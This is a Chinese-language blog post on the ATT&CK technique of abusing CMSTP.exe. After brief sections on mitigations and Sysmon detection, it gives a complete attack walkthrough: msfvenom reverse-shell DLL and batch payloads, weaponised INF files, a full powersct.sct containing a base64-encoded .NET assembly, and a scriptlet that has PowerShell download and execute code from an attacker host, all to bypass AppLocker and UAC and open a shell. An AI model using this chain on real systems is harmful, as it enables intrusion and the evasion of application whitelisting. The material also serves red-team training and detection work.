att&ck之CMSTP

  • A+

前言

att&ck是一个知识大矩阵,本文是抠出矩阵中一个小知识点展开讲解。

CMSTP

Microsoft连接管理器配置文件安装程序(CMSTP.exe)是用于安装连接管理器服务配置文件的命令行程序。CMSTP.exe接受安装信息文件(INF)作为参数,并安装用于远程访问连接的服务配置文件。

攻击者可能会向CMSTP.exe提供感染了恶意命令的INF文件。与Regsvr32 /“ Squfullydoo” 相似,CMSTP.exe可能被滥用以 从远程服务器加载和执行DLL或COM脚本(SCT)。由于CMSTP.exe是合法的,经过签名的Microsoft应用程序,因此该执行过程也可以绕过AppLocker和其他白名单防御。

CMSTP.exe也可以被滥用来绕过用户帐户控制,并通过自动提升的COM界面从恶意INF执行任意命令。

程序示例

名称 |描述
----|:----:
Cobalt Group |Cobalt Group已使用该命令cmstp.exe /s /ns C:UsersADMINI~WAppDataLocalTempXKNqbpzl.txt绕过AppLocker并启动恶意脚本。
MuddyWater|MuddyWater已使用CMSTP.exe和恶意INF执行其POWERSTATS有效负载。


缓解措施

减轻 |描述
----|:----:
禁用或删除功能或程序 |在给定的环境中,CMSTP.exe可能不是必需的(除非将其用于VPN连接安装)。
执行预防 |如果给定系统或网络不需要CMSTP.exe,可以考虑使用配置为阻止CMSTP.exe执行的应用程序白名单来防止对手潜在的滥用。

侦测

使用进程监视来检测和分析CMSTP.exe的执行和参数。将CMSTP.exe的最近调用与已知良好自变量和已加载文件的先前历史进行比较,以确定异常和潜在的对抗活动。

Sysmon事件还可以用于识别CMSTP.exe的潜在滥用。检测策略可能取决于特定的攻击程序,但潜在的规则包括:[6]

要检测本地/远程有效负载的加载和执行-事件1(进程创建)(其中ParentImage包含CMSTP.exe)和/或事件3(网络连接),其中Image包含CMSTP.exe,DestinationIP在外部。
要通过自动提升的COM接口检测“ 旁路用户帐户控制”,请执行以下操作:事件10(ProcessAccess)(其中CallTrace包含CMLUA.dll)和/或事件12或13(RegistryEvent),其中TargetObject包含CMMGR32.exe。还监视事件,例如进程的创建(Sysmon事件1),这些事件涉及自动提升的CMSTP COM接口,例如CMSTPLUA(3E5FC7F9-9A51-4367-9063-A120244FBEC7)和CMLUAUTIL(3E000D72-A845-4CD9-BD83- 80C07C3B881F)。

攻击实际操作(AppLocker绕过– CMSTP)

CMSTP是与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以使用恶意命令进行武器处理,以便以scriptlet(SCT)和DLL的形式执行任意代码。它是一个受信任的Microsoft二进制文件,位于以下两个Windows目录中。

~~~
C:WindowsSystem32cmstp.exe
C:WindowsSysWOW64cmstp.exe
~~~
AppLocker默认规则允许在这些文件夹中执行二进制文件,因此可以将其用作旁路方法。最初,Oddvar Moe发现可以使用此二进制文件绕过AppLocker和UAC,并在他的博客上发表了他的研究。

动态链接库
Metasploit Framework可用于通过msfvenom生成恶意DLL文件。

~~~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll > 1.dll
~~~

INF文件的RegisterOCXSection 需要包含恶意DLL文件的本地路径或WebDAV位置,以进行远程执行。

image.png

~~~
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection

[RegisterOCXSection]
C:Userstest.PENTESTLAB1.dll

[Strings]
AppAct = "SOFTWAREMicrosoftConnection Manager"
ServiceName="manre"
ShortSvcName="manre"
~~~

与cmstp一起提供恶意INF文件时,代码将在后台执行。

cmstp.exe /s cmstp.inf

image.png

Meterpreter会话将从DLL执行中打开。

image.png

SCT

除DLL文件外,cmstp还能够运行SCT文件,从而扩展了红队操作期间该二进制文件的可用性。 Nick Tyrer最初通过Twitter展示了此功能。

Nick Tyrer还编写了一个名为powersct.sct的脚本,在本机PowerShell被阻止的情况下,它可以用作执行PowerShell命令的替代解决方案。该UnRegisterOCXSection需要包含小脚本的URL。最终的INF文件需要包含以下内容:

~~~
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct

[Strings]
AppAct = "SOFTWAREMicrosoftConnection Manager"
ServiceName="manre"
ShortSvcName="manre"
~~~

附powersct.sct

~~~
<?xml version="1.0" encoding="utf-8"?>

<![CDATA[function setversion() {
var shell = new ActiveXObject('WScript.Shell');
ver = 'v4.0.30319';
try {
shell.RegRead('HKLMSOFTWAREMicrosoft.NETFrameworkv4.0.30319');
} catch(e) {
ver = 'v2.0.50727';
}
shell.Environment('Process')('COMPLUS_Version') = ver;
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs8cdWQAAAAAA"+
"AAAA4AACAQsBMAAADgAAAAgAAAAAAAAuLQAAACAAAABAAAAAAEAAACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA3CwA"+
"AE8AAAAAQAAArAUAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAKQrAAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAAA0DQAAACAAAAAOAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAArAUAAABA"+
"AAAABgAAABAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAABAtAAAAAAAASAAAAAIABQC4IQAA7AkAAAMAAAABAAAG"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIgAoAwAABiYq"+
"PgIoDgAACgAAKAMAAAYmKgAAABswAgBSAAAAAQAAEQArSgAoCAAABiYSAB0oDwAACh/1KAYAAAYL"+
"cgEAAHAoEAAACgAoEQAACgwACCgEAAAGKBIAAAoAAN4RDQAJbxMAAAooEgAACgAA3gAAFxMEK7EA"+
"AAEQAAAAACsAEDsAERAAAAEbMAIAmgAAAAIAABEAKBQAAAoKBm8VAAAKAAZzFgAACgsGbxcAAAoM"+
"CG8YAAAKAm8ZAAAKAAhvGAAACnILAABwbxoAAAoACG8bAAAKDQZvHAAACgBzHQAAChMEAAlvHgAA"+
"ChMFKxURBW8fAAAKEwYAEQQRBm8gAAAKJgARBW8hAAAKLeLeDREFLAgRBW8iAAAKANwRBG8jAAAK"+
"byQAAAoTBysAEQcqAAABEAAAAgBYACJ6AA0AAAAAEzACABUAAAADAAARACglAAAKCgYCbyYAAApv"+
"JwAACiYqAAAAQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAdAMAACN+AADgAwAA"+
"cAQAACNTdHJpbmdzAAAAAFAIAAAkAAAAI1VTAHQIAAAQAAAAI0dVSUQAAACECAAAaAEAACNCbG9i"+
"AAAAAAAAAAIAAAFXHQIcCQAAAAD6ATMAFgAAAQAAAB8AAAACAAAAAQAAAAgAAAAGAAAAJwAAAAEA"+
"AAANAAAAAwAAAAIAAAACAAAAAwAAAAEAAAACAAAAAACAAgEAAAAAAAYA9QHJAwYAYgLJAwYAQgFj"+
"Aw8A6QMAAAYAagEAAwYA2AEAAwYAuQEAAwYASQIAAwYAFQIAAwYALgIAAwYAgQEAAwYAVgGqAwYA"+
"NAGqAwYAnAEAAwYAHATNAgYAJAPNAgoAdACDAwoAiQDjAgoAEAGDAwYAAQCWAgoAGgTjAgYALgNS"+
"BAYADgA3AAoAwgLjAgYAXAPNAgYA7wDNAgoAXgSDAwoAEgODAwYAPAP9AwYAmADNAgYAjwLNAgAA"+
"AAAlAAAAAAABAAEAAQAQABAEAAA9AAEAAQBRgMkAtgBQIAAAAACRAN4CuQABAFkgAAAAAIYYVgMG"+
"AAIAbCAAAAAAlgAjBL8AAgDcIAAAAACWAFoAwwACAJQhAAAAAJYA4AAkAAMAAAAAAIAAkSCvAMgA"+
"BAAAAAAAgACRILwAzQAFAAAAAACAAJEg6gC/AAcAAAABAPgDAAABAFYAAAABAEIEAAABAKQAAAAB"+
"AKQAAAACANkACQBWAwEAEQBWAwYAGQBWAwoAKQBWAxAAMQBWAxAAOQBWAxAAQQBWAxAASQBWAxAA"+
"UQBWAxAAWQBWAxAAYQBWAxUAaQBWAxAAcQBWAxAAeQBWAwYAyQBWAwEA0QAuASQA0QD3ACkA0QAA"+
"ASQAgQB9AC0A2QBuAEsAiQDZAgYAkQBWA1AAiQAKAVYAmQB2A1sA4QA4BBAA4QBSABAAmQCRAGAA"+
"iQAZAQYAsQBWAwYADABIA3AAFAAsBIAAsQBnAIUA6QBJBIsA8QAfAQYAeQCNAi0A+QDUAi0AwQAn"+
"AZQAwQA4BJkAwQCRAGAACQAEALEALgALANMALgATANwALgAbAPsALgAjAAQBLgArABIBLgAzABIB"+
"LgA7ABIBLgBDAAQBLgBLABgBLgBTABIBLgBbABIBLgBjADABLgBrAFoBGgAxAI8AtQIcAGkAeQAA"+
"AQ0ArwABAAABDwC8AAEAAAERAOoAAgAEgAAAAQAAAAAAAAAAAAAAAAAjBAAAAgAAAAAAAAAAAAAA"+
"nwAuAAAAAAABAAAAAAAAAAAAAACoAOMCAAAAAAAAAAAAQ29sbGVjdGlvbmAxAElFbnVtZXJhdG9y"+
"YDEAa2VybmVsMzIAPE1vZHVsZT4AbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMA"+
"QWRkAGNtZABSdW5QU0NvbW1hbmQAQXBwZW5kAENyZWF0ZVJ1bnNwYWNlAGdldF9NZXNzYWdlAFJ1"+
"bnNwYWNlSW52b2tlAElEaXNwb3NhYmxlAG5TdGRIYW5kbGUAR2V0U3RkSGFuZGxlAFNldFN0ZEhh"+
"bmRsZQBTdGRPdXRwdXRIYW5kbGUAaGFuZGxlAFJ1blBTRmlsZQBBbGxvY0NvbnNvbGUAUmVhZExp"+
"bmUAV3JpdGVMaW5lAENyZWF0ZVBpcGVsaW5lAENsb3NlAERpc3Bvc2UAQ3JlYXRlAFdyaXRlAEd1"+
"aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2Vt"+
"Ymx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxl"+
"VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlE"+
"ZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2Vt"+
"Ymx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"bXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcG93ZXJzY3QuZXhl"+
"AFRvU3RyaW5nAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbABrZXJuZWwzMi5kbGwAUG93"+
"ZXJTaGVsbABTeXN0ZW0AVHJpbQBPcGVuAE1haW4AU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlv"+
"bgBTeXN0ZW0uUmVmbGVjdGlvbgBDb21tYW5kQ29sbGVjdGlvbgBFeGNlcHRpb24AU3RyaW5nQnVp"+
"bGRlcgBJRW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25v"+
"c3RpY3MAZ2V0X0NvbW1hbmRzAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2Vz"+
"AFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNl"+
"cnZpY2VzAERlYnVnZ2luZ01vZGVzAGFyZ3MAU3lzdGVtLkNvbGxlY3Rpb25zAFRlc3RDbGFzcwBQ"+
"U09iamVjdABwb3dlcnNjdABnZXRfQ3VycmVudABBZGRTY3JpcHQAc2NyaXB0AE1vdmVOZXh0AFN5"+
"c3RlbS5UZXh0AFJ1bnNwYWNlRmFjdG9yeQAAAAAJUABTACAAPgAAFU8AdQB0AC0AUwB0AHIAaQBu"+
"AGcAAQAAABfFYPPntspHpLkoVG2NjN4ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYDhJB"+
"AgIEAAEBDgMAAA4DIAAOGQcIEkUSSRJNFRJRARJVElkVEl0BElUSVQ4EAAASRQUgAQESRQQgABJN"+
"BCAAEnEIIAAVElEBElUGFRJRARJVCCAAFRJdARMABhUSXQESVQQgABMABSABElkcAyAAAgQHARJh"+
"BAAAEmEFIAESYQ4It3pcVhk04IkIMb84Vq02TjUE9f///wIGCQUAAQEdDgMAAAIEAAEODgQAARgJ"+
"BQACAQkYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA0B"+
"AAhwb3dlcnNjdAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDUxM2QwODYxLWRj"+
"ZmYtNDUwNi04ZTEzLWFmNDMyOWZiMWQ4YQAADAEABzEuMC4wLjAAAAAAAAAAs8cdWQAAAAACAAAA"+
"HAEAAMArAADADQAAUlNEUwz589HWFFROlbOenzlxcdkBAAAAQzpcVXNlcnNcSUVVc2VyXERvY3Vt"+
"ZW50c1xWaXN1YWwgU3R1ZGlvIDIwMTVcUHJvamVjdHNccG93ZXJzY3RccG93ZXJzY3Rcb2JqXHg4"+
"NlxEZWJ1Z1xwb3dlcnNjdC5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAELQAAAAAAAAAAAAAeLQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEC0AAAAA"+
"AAAAAAAAAABfQ29yRXhlTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIEAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAA"+
"AAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEA"+
"AQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAKwDAACQQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBT"+
"AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8A"+
"AAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
"ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYA"+
"aQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBu"+
"AHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA6AAkAAQBGAGkA"+
"bABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAcABvAHcAZQByAHMAYwB0AAAAAAAwAAgAAQBG"+
"AGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA6AA0AAQBJAG4AdABlAHIA"+
"bgBhAGwATgBhAG0AZQAAAHAAbwB3AGUAcgBzAGMAdAAuAGUAeABlAAAAAABIABIAAQBMAGUAZwBh"+
"AGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADcA"+
"AAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEIADQABAE8AcgBp"+
"AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABwAG8AdwBlAHIAcwBjAHQALgBlAHgAZQAAAAAA"+
"MgAJAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABwAG8AdwBlAHIAcwBjAHQAAAAAADQACAAB"+
"AFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMA"+
"cwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAALxDAADqAQAAAAAA"+
"AAAAAADvu788P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0i"+
"eWVzIj8+DQoNCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20u"+
"djEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0i"+
"MS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0i"+
"dXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAg"+
"IDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFz"+
"bS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2Vy"+
"IiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8"+
"L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+AAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
"dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'TestClass';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);

} catch (e) {
debug(e.message);
}]]>

~~~

INF文件执行后,将打开一个新窗口,该窗口允许用户执行PowerShell命令。

~~~
cmstp.exe /s cmstp.inf
~~~

image.png


通过使用将调用恶意可执行文件的脚本,也可以执行代码。INF文件需要包含脚本的远程位置。

~~~
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%scrobj.dll,NI,http://192.168.73.1/manre.sct

[Strings]
AppAct = "SOFTWAREMicrosoftConnection Manager"
ServiceName="manre"
ShortSvcName="manre"
~~~

附manre.sct

~~~
<?xml version="1.0"?>

<![CDATA[

        var r = new ActiveXObject("WScript.Shell").Run("powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.73.1:808/1.bat'))"");

    ]]>

~~~
既然是执行任意代码这里我就简单反弹一个shell(1.bat是使用msfvenom生成的)
其实就是调用的wscript.shell.run()来执行系统命令

~~~
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.73.1 lport=44444 > 1.bat
~~~

执行cmstp命令

image.png

可以获得shell

image.png

结论

使用CMSTP二进制文件可以绕过AppLocker限制和执行代码。CMSTP需要INF文件,并在执行时生成CMP文件和CMP文件,CMP文件是连接管理器设置文件。这两个文件实际上都是文本文件,不太可能触发任何警报。因此,如果cmstp.exe二进制文件无法被AppLocker规则阻止,则需要对这两个文件进行监视,以作为危害的指示器。

写在最后

首先大家都知道att&ck,使我们信息安全的知识宝库,那么知识就在那里,我打算把att&ck的每一个小知识点都扩展开,与君共勉

参考链接

~~~
https://attack.mitre.org/techniques/T1191/
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/
https://msitpros.com/?p=3960
~~~

相关推荐: Driftingblues3靶机渗透

Driftingblues3靶机练习 网络结构: 环境搭建平台为VMware15,使用VirtualBox亦可,网络为nat模式,网段192.168.1.0/24 网络由攻击机kali、靶机组成 靶机ip:192.168.1.146 kali linux ip…